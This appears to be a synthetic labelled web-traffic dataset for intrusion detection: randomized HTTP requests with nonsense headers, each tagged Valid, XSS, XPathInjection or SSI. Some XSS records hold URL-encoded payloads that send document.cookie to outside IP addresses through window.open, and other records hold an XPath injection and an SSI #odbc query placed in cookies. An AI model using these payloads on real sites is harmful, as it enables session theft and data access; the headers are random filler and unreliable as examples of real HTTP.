Content-Location: /haeHfyt.tiff
Content-MD5: ZGVlN3RpdG9BbjBldEVsdA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 15 Mar 05 06:45:22 CET
Last-Modified: Fri, 09 Nov 07 23:49:41 GMT
Host: 50.167.198.164
Connection: pdt9t8H
Accept: audio/x-wav, image/*;q=0.0, audio/basic
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 229.74.234.254
Cookie: D5o_W@=(| l4Otdtlw;eifwkf4cq=57605583;Ot=830626;zhtc=m8ooettsccteeA;phmdiwgAst=yagih2sLtgzuto
Cookie2: $Version="1"
Date: Mon, 03 Dec 07 18:55:17 GMT
ETag: "VPeDZV3Za2WLcRfx"
Expect: 100-continue
From: olqi@rEmpe.biz
If-Modified-Since: Mon, 09 Aug 04 08:58:55 CET
If-Unmodified-Since: Tue, 10 May 05 17:45:10 CET
If-Match: "hpqaCLPxlGo.4sEk9"
If-None-Match: "o39brPuviRSJPS1771"
If-Range: Sat, 11 Jul 09 09:06:32 CET
Max-Forwards: 151
MIME-Version: 6.7
Pragma: eihec=itnhruhE
Proxy-Authorization: Basic cFdvaGVzZTpldkhoVXI=
Authorization: Digest realm
Range: 26302-,-510,4934-
Referer: /nisphct/k88h/Nknjo/gpze/tbcsoaho.pl
TE: gzip;q=0.2,deflate,trailers
Trailer: If-None-Match
User-Agent: fnfaj58kk/5.4
UA-CPU: x86
UA-Disp: 7242,197,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2377x8201
Via: 8.0 242.252.113.47, 8.1 www.4beod.html
Transfer-Encoding: deflate
Upgrade: Rdo/4.6, As7e/2.7, wanot/9.0, d3it/2.0
Warning: 265 68.227.212.166:78 "moawtiltates" 
X-Forwarded-For: 69.156.101.181
X-Serial-Number: 61683738419
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

om3lIhn= ra<e2m4ysde|c4node9eumocha&eN5VeaLCipdQ=MsjnBonwindow.opendetete;ois&as=Uo@;ErdjseeEe&pentTeun=diq5qZZy&oenqiRotrs=iUpYK1&-@FCVkhBt6=sht|ejAurjV7t&6fiEI46SdobjectR=7Hmlaa&toif6uiOt&sqoHfiotc9Osor=lt&dru&inputycobjectuGhB=dupdate1ee&SbnuyDlimr=nFf& sretughIt&4NodivO=le1Mbfs&sto6isaroob=2713190717

End - Id: 34926
Start - Id: 22332
class: Valid
GET /OformLWainsertolvlkru/Ois0o9wmntDdOahto/dnzyruheRIOs/uaaDuro1yhhtsh/pd5n/4rpi/0ioli9mcodeny.jpg?WlEVautoexecJA61x=sdaeand%3Ebhuhd5tha&rani=6654916 HTTP/1.1
Host: www.tureser.gov
Connection: hcRevotm
Accept: text/html, text/xml
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Reea-rs;q=0.6, tnb7-r2daeya
Cache-Control: ir='e'
Client-ip: 16.123.94.148
Cookie: NyM0m5-Nk=bt9elel5nspms;P4wVps3allI=teL9dslfireg;api35z_=1661;update_b3H=eShhnEIleCtenEsw
Cookie2: $Version="57"
Date: Tue, 06 Jan 04 21:08:43 GMT
ETag: W/"lHVx_e.CMm9IOvVHpR"
Expect: 100-continue
From: iHpsna2i@sBsaOrTep.ch
If-Modified-Since: Wed, 31 Aug 05 12:44:03 UTC
If-Unmodified-Since: Wed, 30 Jul 08 12:01:20 UTC
If-Match: *
If-None-Match: "zrX7-uJgo7c-8Go9"
If-Range: Mon, 06 Nov 06 01:26:32 GMT
Max-Forwards: 9
MIME-Version: 2.0
Pragma: h=adrj
Proxy-Authorization: NTLM ZW1vdG9mb3BhanRydHB5b3Nkc2xldHJhaGVhdG5lYWRvY3NzaUVlQXJudGNiZmNm
Authorization: Basic OW44dHI6b3JlaQ==
Range: -086874,-834
Referer: http://www.io95atrg.uk/teeowusa.exe
TE: gzip;q=0.0
Trailer: Trailer
User-Agent: kctnhicna (ebgtRC; njxWNmW2)
UA-CPU: StrongARM
UA-Disp: 6322,2576,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 254x8392
Via: auXnfx/3.0 213.148.48.217
Transfer-Encoding: deflate
Upgrade: eOhtM/9.6, icm/5.3, zas/4.8
Warning: 671 28.174.76.18 "cWdlqucSkne3oqeaa" "Tue, 12 Oct 04 20:29:33 CET"
X-Forwarded-For: 205.232.245.228
X-Serial-Number: 8809830
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22332
Start - Id: 33684
class: Valid
POST /1Mbandc9@/t0Y84XGKS1zSNiqsW/t-BbSh/o1hoZux5VB33DvjNV/gYePyZKlusWlWkqW2ukj/sz-DO49Bu-cjzMOBbHPh.pl? HTTP/1.0
Content-Length: 46
Content-Language: e,cmdt0yts,KrTeli
Content-Encoding: compress
Content-Location: /ao4tl6a/teapa/uqa6jrun.jsp
Content-MD5: U3o3b21sdXVFbm5hbGtzcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 14 Mar 04 08:51:22 CET
Last-Modified: Tue, 11 Aug 09 11:54:46 CET
Host: www.clh3.de:94
Connection: close
Accept: text/html;q=0.8, audio/x-wav;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 90.27.9.165
Cookie: ahI6G8yiad=m;rLer=yati stdinfdgroup byt boiu
Cookie2: $Version="3"
Date: Thu, 12 Oct 06 11:01:46 UTC
ETag: "3qLK60XdfN_mJFA"
Expect: 9Nzbe=noestte4
From: EWghrs@bKfdtalaoe.it
If-Modified-Since: Fri, 17 Oct 08 24:12:44 GMT
If-Unmodified-Since: Fri, 14 Oct 05 11:27:13 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 23 Jan 10 08:49:17 GMT
Max-Forwards: 6
MIME-Version: 2.0
Pragma: t=6s5xyw
Proxy-Authorization: ieeu erdA=ydosr
Authorization: Basic ZGRPdHMxYTppcm1k
Range: 016-7,68-
Referer: http://c5shgskf.ch/ocoaop2.sh
TE: gzip;q=0.7,trailers,deflate;q=0.9
Trailer: TE
User-Agent: teRcc (wCiDc4pq; ae9KTcL)
UA-CPU: PowerPC
UA-Disp: 4395,796,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 603x625
Via: 1.6 168.90.141.176:82
Transfer-Encoding: gzip
Upgrade: zssryR/6.5, ijnS/5.1, dEsf/4.2, Wss/3.6, Ktea/4.4
Warning: 300 www.tee4pele.htm:300 "alucgoit7ep1s" 
X-Forwarded-For: 42.88.102.174
X-Serial-Number: 695598853636
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

wMo26ar=zJo&J5GA=60618&3u3FXQxLift=j+t2-Btrm

End - Id: 33684
Start - Id: 20860
class: Valid
GET /k32P/utfvpwRNx/TJosam1B6ydI/p9.kOiPlcrNXvtdgkf/e2vop8NA67wpBf1pgu/fi1t4/u59-N0/66jnellwEnwde/LcP8F/lhC/rbi/vihrebf.sh? HTTP/1.1
Host: www.vstAtNeeb.de:80
Connection: lilosg
Accept: text/xml
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 186.115.77.25
Cookie: 1eulkf=hsAchc13riay>Qt;ohhM3cbrnijm=y1tssawinnt;nnQasE8rup9m=827501
Cookie2: $Version="34"
Date: Sat, 12 Nov 05 17:03:43 GMT
ETag: "BnbYQ5mwr2P6C.zMiP@"
Expect: 100-continue
From: dnCSe5st@sqeawRtsa.cz
If-Modified-Since: Fri, 16 Oct 09 05:55:33 CET
If-Unmodified-Since: Mon, 25 Jun 07 12:08:34 CET
If-Match: *
If-None-Match: "bVmJmUvv4nHd.HrOZunm"
If-Range: *
Max-Forwards: 4729
MIME-Version: 8.4
Pragma: ac=edu
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest nc=e96ec373
Range: 4992-
Referer: http://www.Lrjetnur.gov/nu8CDdle/mo5sub/orth/m7kn.cgi
TE: gzip;q=0.3,chunked;q=0.8
Trailer: Referer
User-Agent: raaeohto (fYatwE5vr; mlTTvhs2F)
UA-CPU: StrongARM
UA-Disp: 550,7756,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 691x8896
Via: 6.0 www.idOgrn.html
Transfer-Encoding: compress
Upgrade: deqrsi/3.0
Warning: 296 214.47.11.12 "2nWtseAGip4" 
X-Forwarded-For: 196.176.140.95
X-Serial-Number: 390733
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 20860
Start - Id: 47255
class: XSS
GET /ktoPy/0rfalaik/aTU/lsHngdeeq/Wps@Cx1sYFWR/0RJjH/gcEy6axSw9lF3G-nz_s-/09S1/4fTpsnDk365x/sAEIlerdohfEnkg/tgqheo9.swf?Rfkmit=%3Cdiv+++++style+%3D+%22binding%3A+++url%28%5Bhttp%3A%2F%2Fwww.ieonge.com%2Fscript%2FgaeroFcc.sh%5D%29%3B+++%22++%3E HTTP/1.0
Host: 253.104.24.237
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish;q=0.2, iso-10646-ucs-2, windows-1258;q=0.0
Accept-Encoding: *;q=0.2
Accept-Language: ite-nytso, ph0p-L, s3azi-lre1ap;q=0.2
Cache-Control: min-fresh=77465
Client-ip: 41.54.252.143
Cookie: e18gatNi6egnat=feaa7eseei;htNoOne=;xssou%deacande=He7;ieaHoehi8j6o=Tflikex&lDD$'wnyr
Cookie2: $Version="62"
Date: Thu, 08 Mar 07 20:36:01 CET
ETag: W/"q0-hAtnazO7nbLaKys"
Expect: 100-continue
From: mP8eatM@krgt.fr
If-Modified-Since: Tue, 11 Sep 07 15:28:44 GMT
If-Unmodified-Since: Tue, 26 Jan 10 12:40:54 CET
If-Match: "KC6CdXakHl7FHJRg0_D"
If-None-Match: "XsKE8PY06ZRrViyHjqJy"
If-Range: "p3.BQaZCl7N6PhYI"
Max-Forwards: 000
MIME-Version: 3.6
Pragma: aoTec='ois'
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: NTLM YWRibm9hY2VteWVueWVpaXRzbzZyZTV0b2Jwenl0VzVjeWxpaWVsc2E=
Range: 33-500,52893-,358-
Referer: /4inl8/teoeeaea/lfie.exe
TE: gzip;q=0.5,deflate,deflate
Trailer: Proxy-Authorization
User-Agent: sGGAq6POY http://www.jsta.be
UA-CPU: StrongARM
UA-Disp: 390,072,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 077x3740
Via: aHcv/6.6 49.181.57.164, Pmhll/3.2 112.15.42.138
Transfer-Encoding: deflate
Upgrade: ebpgud/5.5, uo6ys/3.0, eeei/3.0, wOU/7.9
Warning: 231 178.152.9.49 "iem9a" "Sat, 05 Jul 08 14:59:50 GMT"
X-Forwarded-For: 29.33.63.135
X-Serial-Number: 15152704800
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47255
Start - Id: 47539
class: XSS
GET /nKxGWCfYhSK/iet7roy/revagc/2ohrasRirNaealc/gEUzrJLt1RVg/y_hXteyCVuNx8/b76oid@copyl/aNWr5rxTTf5pB./J.fe11M5zS_LKX/gLcS-uPN0.tiff?gpahqst=%261aeb2%24&tLn=%5B%5CxC0%5D%5B%5CxBC%5Dscript%3E%5Bwindow.open%28%27http%3A%2F%2F172.188.20.73%2Froan.php3%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript++%3E&sekge9lmoOkthBy=62123&rdmStj=etadmintu HTTP/1.0
Host: www.Zosze.net
Connection: otuh
Accept: image/*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: lh-gEt, heeemetw-N, pal-B3he, et-n;q=0.8, u-ochc2ofs;q=0.0
Cache-Control: only-if-cached
Client-ip: 197.79.183.202
Cookie: dmreo=eLecu;52blc9lb8nessid=i%rv
Cookie2: $Version="61"
Date: Sun, 29 Jan 06 12:18:29 UTC
ETag: "_JQz@6_kdlKXmlwio3"
Expect: pnInt
From: sevLsg9@hooNmu.fr
If-Modified-Since: Mon, 13 Mar 06 22:45:17 CET
If-Unmodified-Since: Mon, 08 Jan 07 16:01:31 CET
If-Match: *
If-None-Match: "NZPJFprBlQpkBW-ma"
If-Range: "zbD6bwp@EhO9Zn0"
Max-Forwards: 2
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="zlsmsen9"
Authorization: bMhsg esQt=Vnate6
Range: 8094-,77-91254,-8945
Referer: http://1mraC.biz/owypyc/a7stt/iygih1/hgnd/ihBdr.jsp
TE: trailers,chunked;q=0.2,trailers
Trailer: TE
User-Agent: Mozilla/3.9 (X11; U; SunOS sun4u 9.2; 9d-e5; rv:6.6.0) Gecko/63678227
UA-CPU: 68000
UA-Disp: 050,2452,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2187x3503
Via: 7.5 39.34.171.134, 0.0 www.hfnpceem.gif
Transfer-Encoding: a7ut; derLnT=bsferx
Upgrade: ehzL/0.2, mtlah/0.2, jsco/5.4, toi/4.5
Warning: 992 www.4eiian.js "meeteeolpwgufO" "Tue, 02 Mar 10 02:39:00 CET"
X-Forwarded-For: 112.231.125.157
X-Serial-Number: 870651819
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47539
Start - Id: 35919
class: XPathInjection
PUT /2PEh4O/82D/Yp-7@/tfbtramwc/tKQUbp37m3jD083alsdY/VPwEb4MHtmp2H.msf? HTTP/1.1
Content-Length: 221
Content-Language: shg,rreyue,n
Content-Encoding: gzip
Content-Location: /mddsy/lAln/IaAenl.dll
Content-MD5: dWV0aGE5c2ZtZTRyZHM1bg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 Jun 07 04:51:35 UTC
Last-Modified: Sun, 24 Jun 07 22:46:03 CET
Host: www.euhisdApsf.ch
Connection: close
Accept: */*;q=0.3
Accept-Charset: us-ascii;q=0.1
Accept-Encoding: 
Accept-Language: p9-yrsnihny;q=0.0, ljdnafn2-wun3rs;q=0.9
Cache-Control: min-fresh=955
Cookie: u0teseS8x7teic=O/f/m/child::node()[  position()=117]     |   cmr/m/fbni/child::text()[position()=969]    or     'Eb'  =   '
Cookie2: $Version="8"
Date: Fri, 12 May 06 21:48:24 GMT
If-Unmodified-Since: Sat, 13 Oct 07 09:48:43 UTC
If-Range: *
Referer: http://7Tcleare.uk/htDos.asp
User-Agent: Mozilla/6.3 (compatible; 5enhul0xzy; Open BSD i386; Srmoerc0; haez)
Transfer-Encoding: cHen9e

0paceozmineDir=u&OdWQH=l96yXtU&iisiiIeo5Sf=27&ib8tlfesc=t &neekelltwi5ne=53932&2t=eisaeM&dnozE4kta=6&7Nohsnho=7846&yf.@echo@gxY=eiee0t&pemovo8=6enllyahiCriA&ledto6txaeioy=4760966&8m@us=a-yXt&uodhgds7r=cjejtu&sgd=217709207

End - Id: 35919
Start - Id: 27810
class: Valid
GET /zsnytctoedTlea/Ywe/cbndaho8weghcby3ioy/iecf/3Dm4acceptXKoUoi/6u-.QyGZkReZcQYrTN2Q/a3JS9mU4rn5Ax0iIZ/n0c/oTMzL/V3SoYBw_rhttpOd.Gx.shtml? HTTP/1.1
Host: www.dpis.st
Connection: ooncamel
Accept: text/xml, text/plain
Accept-Charset: gb2312
Accept-Encoding: deflate, identity;q=0.1, compress;q=0.7
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 26.146.129.98
Cookie: th2etolptbDTn=obmaw9u3 cnclN=a;tmPsiibbntts=wheres]pacmivti+ohohd;evpelhntEf7Ewy=a\@ntfd?
Cookie2: $Version="203"
Date: Fri, 08 Dec 06 06:18:24 UTC
ETag: W/"n@EUvrKFmKhTAm_tQDw"
Expect: 100-continue
From: omsc@oihc6.biz
If-Modified-Since: Sat, 20 Mar 10 11:50:04 UTC
If-Unmodified-Since: Mon, 27 Oct 08 06:24:14 CET
If-Match: "uW@g9VaHWWuMRkI0"
If-None-Match: *
If-Range: *
Max-Forwards: 5360
MIME-Version: 8.8
Pragma: htxeo='esu'
Proxy-Authorization: mntnor HgotSst=Rpgnni
Authorization: NTLM ekJhdTdvM21rYXIwYmE3cDQ2ZmxyZWZlaDFjTTdzYWVlbXh4UGU2
Range: -83593,-88
Referer: /Ccftce/eogs/hzx5Ehm/ueeel/eNo9xsee.txt
TE: trailers
Trailer: From
User-Agent: Mozilla/9.1 (X11; U; Linux i586 8.6; i9-s1; rv:4.6.4) Gecko/28030025
UA-CPU: x86
UA-Disp: 626,6964,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 370x5547
Via: HTTP/7.1 www.sodus.htm, FTP/8.9 251.35.127.152
Transfer-Encoding: deflate
Upgrade: 8oArj/0.3, elhh/1.2, 9oUsf/7.4, bib/0.3
Warning: 385 66.29.237.87 "tWatMe1aWih2eBbet" 
X-Forwarded-For: 171.157.110.56
X-Serial-Number: 26514
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27810
Start - Id: 4858
class: Valid
PUT /tmsaDofrwLN/ymrdp4wieNgtoesttl/k5XNCPoh6.7Y1uqu/echogJhttps5qAJpKM/XdhT5t/iMRt5JefPt_Tl/cY9s5r0ZCbnI@-Do.js? HTTP/1.1
Content-Length: 101
Content-Language: ea,iotoeel
Content-Encoding: deflate
Content-Location: http://www.inAt.biz/aahoieo/ste25/tghIi/eEi4w39/i3lera.php3
Content-MD5: bmlnYnRyaWxybnZybWVnbA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 12 Apr 04 03:33:41 GMT
Last-Modified: Fri, 24 Sep 04 16:41:33 GMT
Host: www.2xqa.cz
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: Eccwpe4-aieCa
Cache-Control: no-store
Client-ip: 3.49.175.61
Cookie: 8KKw5b=3hlgog(+Re5x
Cookie2: $Version="272"
Date: Wed, 19 Mar 08 16:05:05 GMT
ETag: "q0j_.QPQiNvZ5COOw"
Expect: 100-continue
From: oSlaiue@hcLiiuu.gov
If-Modified-Since: Sat, 12 Aug 06 08:22:59 GMT
If-Unmodified-Since: Tue, 10 Oct 06 20:09:53 CET
If-Match: "yv3yTjulsU1SfcKbzF"
If-None-Match: *
If-Range: *
Max-Forwards: 9910
MIME-Version: 8.6
Pragma: sh='faeoss'
Proxy-Authorization: naIcSN re1rfCoS=bpehrr
Authorization: Digest algorithm=yantsSR
Range: 417-56358,-20
Referer: /laeryg.swf
TE: deflate,chunked;q=0.0,chunked;q=0.3
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.0 (X11; U; Open BSD i586 6.5; aa-it; rv:6.8.1) Gecko/40282341
UA-CPU: Sparc
UA-Disp: 092,446,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 931x5037
Via: FTP/9.2 190.205.56.250, FTP/9.4 www.madni.jpeg, 1.2 www.8EDdad.htm
Transfer-Encoding: compress
Upgrade: tai/1.2, etrTcE/8.4, bsyg/5.1, coEs/1.6
Warning: 091 www.ve9ajra.gif "5hatsaitInswuanhdaEe" "Fri, 20 Jun 08 21:51:13 CET"
X-Forwarded-For: 119.68.107.192
X-Serial-Number: 688276935690
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tttna0tSptzrp=287153&iomusTa=973&Ltsjcslss=$htftpeih-?;e uh&ewmtERavs2ohu1j=eo|om\onanusrer

End - Id: 4858
Start - Id: 34163
class: Valid
PUT /zbincludeQ/qz2KAXCXG0/MpbnggtemcAMDho5eg/seIes3ceusosqur56Tnn/access_logxOXHkuxmlUFBeB/tG@UP4_Kihz_.tiff? HTTP/1.0
Content-Length: 74
Content-Language: rixt
Content-Encoding: compress
Content-Location: http://Ysu6a7.de/e5i7/eaussT/Ot5ont/neahnnht/0naf.tiff
Content-MD5: dHlJbGVZbmRlbm1nT21Eeg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Jan 08 06:21:18 UTC
Last-Modified: Tue, 25 Dec 07 14:59:06 CET
Host: www.oIcrnU.com
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 229.106.129.24
Cookie: a2dasrelQlsot=u;irhtalenmonsen=otIez;hfr6im=47665833;Toeoaot=5076915994
Cookie2: $Version="0"
Date: Mon, 12 Apr 04 22:42:40 UTC
ETag: "W6RIxcRFJaUsrHepwgOU"
Expect: 100-continue
From: ol8k@oiren.st
If-Modified-Since: Tue, 29 Mar 05 20:05:11 CET
If-Unmodified-Since: Sat, 11 Nov 06 22:24:56 CET
If-Match: *
If-None-Match: "-EKiJU11uKCir9FMjodf"
If-Range: "z@7KfC0L2Mrrw.g"
Max-Forwards: 1112
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: sahe tsshe=ajtnobe
Authorization: NTLM cnFpMzNzSGJoZG9ob3VhYWF0clRyYWVyZnR0YWVpNHN6elhl
Range: 713-,7885-54
Referer: /esethtu/rhnaTiGt/awtdr.htm
TE: trailers,trailers
Trailer: Authorization
User-Agent: C0aOgaoei
UA-CPU: x86
UA-Disp: 892,7658,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 995x590
Via: 6.4 www.ifmonntr.css
Transfer-Encoding: deflate
Upgrade: r9e3sj/2.9, ssde/1.5, 28o5l/1.1, cra/1.9, oir/5.1
Warning: 026 www.euaepe.tiff "E1ssmoL4mnehtgAslnrW" 
X-Forwarded-For: 148.127.25.65
X-Serial-Number: 8391965
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~

yav=awri0&aie=eTnhx&s&tmhtwsAtww=aaaflebsfes2oreeG&aendaiemfBmJe=|sauo

End - Id: 34163
Start - Id: 40964
class: SSI
POST /HCjSzlibD.s1Xadmin/kdXSZy/tlltuooiRoeeItJrrz/iW12hBhiCD__Kw/lsftp49.gHg/en.oN_ht/wcm/n33OdBlXHuB-gf/mJR./FCFT90@rIKL2Ztu.shtml? HTTP/1.0
Content-Length: 93
Content-Language: N31eob6,t6i,7zi5e
Content-Encoding: identity
Content-Location: http://www.niiep.it/c3aoeil/eSj9l/sotr7/noyip6h/te8njafu.bin
Content-MD5: SXV0ZWVzcjVmd2doZW9oeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 16 Aug 08 08:33:52 CET
Last-Modified: Fri, 17 Sep 04 10:35:27 GMT
Host: 81.57.243.189
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: cp-932;q=0.9, iso-8859-4;q=0.1, iso-8859-8-i, shift_jis
Accept-Encoding: deflate, identity;q=0.0
Accept-Language: *;q=0.4
Cache-Control: no-store
Cookie: enPIayzCnl=ad9;TdAy8F7Q=<!--    #odbc  statement=  "select  deuAlm,  ctaendht, xarpEa     from t9erOncd order by     2,     068,   3"  -->;DmHuhehkMthn=]1e%c
Cookie2: $Version="56"
Date: Mon, 27 Feb 06 24:06:36 GMT
ETag: W/"SW16dEtP61Xm@eaVGdp"
Expect: roay8d=wtrfnol
If-Modified-Since: Mon, 09 Feb 09 21:05:15 UTC
If-Unmodified-Since: Mon, 22 Feb 10 04:02:46 GMT
If-Match: "meriU_IvHUEkDfy"
If-Range: *
Max-Forwards: 76
MIME-Version: 4.2
Pragma: oe=riW
Authorization: Digest opaque="thys"
Range: -1
Referer: http://www.nf8hAg9i.be/6rs3h/iHgaoa/ixfnr9pf/r14cn.css
Trailer: Expect
User-Agent: Mozilla/7.2 (Machintosh; U; Mac OS X 3.0; it-2f; rv:4.6.6) Gecko/32195248
UA-Color: color16
Transfer-Encoding: deflate
Upgrade: tnrn/8.3, Tpo/9.5, noyBao/0.0, aeoa/8.2

r0lH=mz<&R3ku@IEcCqF=73414765&KUAA5K-OA=0&fEurtbruh0h=loijCE6V&aSntcwiqpzr=le&jtbtdeI=17108

End - Id: 40964
Start - Id: 47143
class: XSS
GET /nxCE/l.cvB-1dMZu.html?o8eleltg=nutxmll&ceostwtptteshe=88074&hnblrtlaitm=60011&MacceptYTFx=wOqtFoZ-Xl&me0iwb=Uiueis1mz&idvtanldhsohele=82510&nurAenap=ia&ngfetb6jeu=i2BKlob.JW7&caoo=tmni&ytsslTe=h%25like&9X0z=srTasis1&tneeiva8s=%3Cxml++++src+++%3D+++%22javascript%3A+%5Bwindow.open%28%27http%3A%2F%2F216.97.198.144%2Fndla.exe%27%2Bdocument.cookie%29%3B%5D++%22+%3E&3eteomwlgtred=eThV1arUJ HTTP/1.0
Host: 90.102.166.223
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: eeafhei=Phh2ds
Client-ip: 194.231.176.241
Cookie: ute5yEnhb=Otmde;5hcee=aef70;6jnefkhmly=2eaul;nxeeer4eeliei=en;BSwtco6fmh=et@8vahonuEi0os
Cookie2: $Version="9"
Date: Sat, 13 Oct 07 08:50:59 UTC
ETag: W/"h8GIdQBR_P5h.4Cev5X"
Expect: 100-continue
From: xeliaGtt@ccieug.de
If-Modified-Since: Fri, 24 Aug 07 17:42:58 CET
If-Unmodified-Since: Mon, 27 Apr 09 04:33:52 GMT
If-Match: *
If-None-Match: "UdGQgBJJXIMgwNCtTiI6"
If-Range: *
Max-Forwards: 846
MIME-Version: 6.6
Pragma: oex=8imwuea
Proxy-Authorization: Digest nc=e04736F8
Authorization: NTLM bnJ0MHUzNGkzYjVhaXZyYXdlY29sOXJvZGlvbnNhc290b3Jscw==
Range: -35233,639-
Referer: /tihedao/Nshcec/rpigsla/asmisun.jpg
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/1.9 (X11; U; SunOS sun4u 0.4; ne-0h; rv:5.2.5) Gecko/09088169
UA-CPU: 68000
UA-Disp: 2636,076,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: 5.5 201.223.246.78, 4.4 www.e0sar.css
Transfer-Encoding: deflate
Upgrade: oslis0/7.1
Warning: 339 51.64.209.7 "6Kirtt2tetFxoo" "Fri, 17 Oct 08 02:00:42 UTC"
X-Forwarded-For: 77.180.133.237
X-Serial-Number: 54001451967
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47143
Start - Id: 26234
class: Valid
GET /eEoaoin5snarihgd7j.mdb?eiwo1qedM=64329&9nlup7snu=aTm&uEDvlrghmxp=nbcj%5Dvrpbes1pconnect&ezelT=sse&ssyrzaoeia4Tl=aeenlnln&rqbSkrkrm=rihuelsejnsboget&ohtugh1ruEl=eh-maile&Ojtlleamoq10e=ky35otl5srddsnaal&mhOua8e8odf=andmen&@8OpsbodydCVIhavingx9=linke+node&QgmSRcopyKQj=ib8wSbfbiSFT&5htl=o4Tw47&7gDD=lJn HTTP/1.1
Host: www.uoD4fbO.biz:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: ss='uvctrOh'
Client-ip: 240.195.101.153
Cookie: e0eea9ssce=huSdazoth0;IaOCvbscriptacceptENJW=59;script5mjepE=21;Wyrp1=s
Cookie2: $Version="197"
Date: Mon, 31 Mar 08 22:33:48 GMT
ETag: "n-GG_NG.sLOr5AFW"
Expect: 100-continue
From: sdrsuf@Ecitr.org
If-Modified-Since: Wed, 14 May 08 02:21:16 CET
If-Unmodified-Since: Tue, 13 Jan 09 04:51:49 GMT
If-Match: "_5BvCiHE47T3b@@w9h8d"
If-None-Match: "ard@E..2km2XcS9Xehb"
If-Range: Fri, 31 Oct 08 19:33:02 CET
Max-Forwards: 72
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM YWV5bnllbjhuaW9laW5jbmhybmFyb2VhNG90d3Vkb2lzcWU=
Authorization: hlncRl atr6=enhho
Range: 47781-
Referer: /Nuntteai/ptrm1/poitb.cgi
TE: trailers,gzip;q=0.4
Trailer: Accept-Charset
User-Agent: Mozilla/5.5 (Machintosh; U; PPC Mac OS X 7.5; oa-8e; rv:2.8.7) Gecko/64543001
UA-CPU: PowerPC
UA-Disp: 9474,169,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 539x1733
Via: 1.0 www.Anldnr.html
Transfer-Encoding: deflate
Upgrade: erore/6.2
Warning: 942 www.roe5.js "9fTnaE3ws2" 
X-Forwarded-For: 248.73.239.249
X-Serial-Number: 30560
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26234
Start - Id: 18478
class: Valid
GET /mIsp5rsYs/p6ldWmzo4l5/Th5/ns9eslxzrOo9i/h5TN/mPWnOiA0CZ0IteXlPM/e4Z/tUo/f1tebpiS5aSntisi2tha.shtml?tbrddhiVs=rreahg4rhencTle&thardccee2tTx=513&IFt0eayeceN=o%2BDtelnets7egroup+by%5DchildsLt%5B%26n&Zk9XI=processing-instructiontelnetznulljamocha+tst%3Fee&cwp-A-tM9WIWN=0evetcej6iedttots&Set58toHai=m7cythsaumHi%5Ccsa&uchttp-snu7ncSt.=wCxlf&eoiseyCaohEsenh=38248495&ysdXfK=%40obe%3C&zd6wB=dq7an2rdc&82nulliH72L3MJb=ttre6echotmo7+nmeta5ne%3Djer&S8nr=aqUE HTTP/1.1
Host: 130.128.49.129
Connection: close
Accept: audio/*, text/plain;q=0.9
Accept-Charset: windows-874;q=0.5, iso-8859-2;q=0.7, x-mac-turkish
Accept-Encoding: *;q=0.0
